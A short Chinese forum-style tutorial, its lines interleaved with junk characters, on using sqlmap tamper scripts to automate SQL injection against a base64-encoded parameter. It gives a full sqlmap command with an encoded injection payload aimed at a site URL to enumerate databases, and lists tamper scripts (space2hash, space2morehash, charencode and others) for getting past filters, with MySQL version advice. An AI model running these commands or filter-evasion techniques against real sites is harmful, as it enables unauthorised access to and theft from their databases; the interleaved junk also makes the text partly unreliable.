WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
; D% O9 [ ]7 f. p# \: a2 {
) b; t. g- F0 C+ u T% i( D2 l! Hsqlmap的tamper里有个base64encode.py8 Y) L. V; A, Z/ S
) G G1 d1 o$ b0 ^ n( g使用如下
# d2 B+ g9 x+ h1 z
4 l9 r! b6 C/ i( I( I* wsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
; ^ L e# U' C! C& i* T! m5 x
' h s4 u+ b& ?, K: R
4 P% S" |: ]9 a2 \. \sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”; a5 M* J6 f; r
6 h# L5 y; p2 G. u1 P0 ~: e
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
! g% g6 u& j+ E) s1 h7 Z0 S4 c8 r# c; o/ D1 U! L
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
( \8 p6 W$ P4 o6 e1 Kspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
8 Q/ Z0 {% u/ @首先确定目标数据库版本,然后选择相应的脚本。
4 c; H' N- M { z8 ~( D3 p# z' }-v 3 --batch --tamper "space2hash.py"' o/ D# G+ ]) C1 j: Z
1 M" u3 j) S. c0 O5 r8 _5 w2 q: G0 [
还有其他一些插件:6 j1 v4 C* o5 B2 \% x# U! S
encodes编码 ——charencode.py* S5 b" U' s2 S% E, Q5 G
base64编码 —— base64encode.py
# A; k c& a" J8 H, D" `替换空格和关键字 —— halfversionedmorekeywords.py! U6 N3 L3 t& H$ [4 _
|
# `8 X9 J4 t. Y% K$ [4 Z
& {% E. q8 f. U" b9 k" Q4 J8 X' p3 y- a. k
8 {3 v- _ [9 [& c8 W2 _$ i2 M$ R, z7 p
|